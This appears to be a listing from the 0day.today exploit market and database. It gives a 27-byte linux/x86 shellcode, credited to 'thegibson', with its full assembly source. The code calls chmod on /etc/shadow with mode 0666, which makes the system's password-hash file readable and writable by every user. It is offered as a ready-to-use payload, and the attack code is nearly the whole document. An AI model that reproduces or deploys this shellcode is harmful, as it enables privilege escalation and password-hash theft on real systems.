[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 chmod 666 /etc/shadow 27 bytes

Author
thegibson
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10104
Category
shellcode
Date add
16-01-2010
Platform
linux/x86
========================================
linux/x86 chmod 666 /etc/shadow 27 bytes
========================================

; linux/x86 chmod 666 /etc/shadow 27 bytes
; root@thegibson
; 2010-01-15
 
section .text
        global _start
 
_start:
        ; chmod("//etc/shadow", 0666);
        mov al, 15
        cdq
        push edx
        push dword 0x776f6461
        push dword 0x68732f63
        push dword 0x74652f2f
        mov ebx, esp
        mov cx, 0666o
        int 0x80



#  0day.today [2024-11-16]  #